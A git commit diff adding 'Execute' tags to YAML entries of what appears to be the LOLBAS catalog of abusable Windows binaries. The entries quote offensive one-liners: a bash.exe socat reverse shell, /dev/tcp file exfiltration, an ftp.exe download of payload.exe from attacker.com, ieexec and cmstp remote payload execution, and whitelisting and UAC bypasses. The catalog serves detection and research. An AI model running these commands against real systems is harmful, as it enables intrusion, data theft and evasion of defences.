Adding Execute tags to most LOLBas (#405)

This commit is contained in:
hegusung 2024-12-29 18:31:01 +01:00 committed by GitHub
parent baaa5bbc73
commit b9a6cd6a87
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
129 changed files with 520 additions and 59 deletions

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: .NetObjects
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Local Admin Privileges: Local Admin
MitreID: T1053.002 MitreID: T1053.002
OperatingSystem: Windows 7 or older OperatingSystem: Windows 7 or older
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -25,6 +29,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@ -32,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\bash.exe - Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe - Path: C:\Windows\SysWOW64\bash.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Input: INF - Execute: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -21,7 +21,8 @@ Commands:
MitreID: T1218.003 MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Input: INF - Execute: INF
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: "conhost.exe --headless calc.exe" - Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable) Usecase: Specify --headless parameter to hide child process window (if applicable)
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\conhost.exe - Path: c:\windows\system32\conhost.exe
Detection: Detection:

View File

@ -13,6 +13,15 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\control.exe - Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe - Path: C:\Windows\SysWOW64\control.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\CustomShellHost.exe - Path: C:\Windows\System32\CustomShellHost.exe
Detection: Detection:

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: ClickOnce
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1003.003 MitreID: T1003.003
OperatingSystem: Windows server OperatingSystem: Windows server
Tags:
- Execute: CMD
- Command: diskshadow> exec calc.exe - Command: diskshadow> exec calc.exe
Description: Execute commands using diskshadow.exe to spawn child process Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures Usecase: Use diskshadow to bypass defensive counter measures
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows server OperatingSystem: Windows server
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe

View File

@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows server OperatingSystem: Windows server
Tags: Tags:
- Execute: DLL - Execute: DLL
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe

View File

@ -46,7 +46,6 @@ Commands:
Privileges: Admin Privileges: Admin
MitreID: T1003.003 MitreID: T1003.003
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
Full_Path: Full_Path:
- Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe

View File

@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: .NetObjects
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: explorer.exe C:\Windows\System32\notepad.exe - Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\explorer.exe - Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe

View File

@ -25,6 +25,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\System32\fsutil.exe
- Path: C:\Windows\SysWOW64\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: Gpscript /startup - Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe - Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help. Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe Usecase: Execute process with HH.exe
@ -18,6 +21,20 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.001 MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CHM
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\hh.exe - Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe - Path: C:\Windows\SysWOW64\hh.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\system32\ie4uinit.exe
- Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
Tags:
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files\Internet Explorer\iediagcmd.exe - Path: C:\Program Files\Internet Explorer\iediagcmd.exe
Detection: Detection:

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
@ -18,6 +21,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Admin Privileges: Admin
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path: Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Input: Custom Format - Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
@ -22,8 +22,8 @@ Commands:
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL (.NET)
- Input: Custom Format - Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload - Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: JScript
- Command: jsc.exe /t:library Library.js - Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: JScript
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: VB.Net
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code Usecase: Compile and run code
@ -18,6 +21,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code Usecase: Compile and run code
@ -25,6 +30,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.014 MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: COM
- Command: mmc.exe gpedit.msc - Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218.014 MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe project.csproj - Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file. Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code Usecase: Compile and run code
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL Usecase: Execute DLL
@ -35,7 +39,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: XSL
- Command: msbuild.exe @sample.rsp - Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections Usecase: Bypass command-line based detections
@ -43,6 +47,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1036 MitreID: T1036
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe

View File

@ -11,6 +11,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\msconfig.exe - Path: C:\Windows\System32\msconfig.exe
Code_Sample: Code_Sample:

View File

@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: MSI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting Usecase: Execute code bypass Application whitelisting
@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
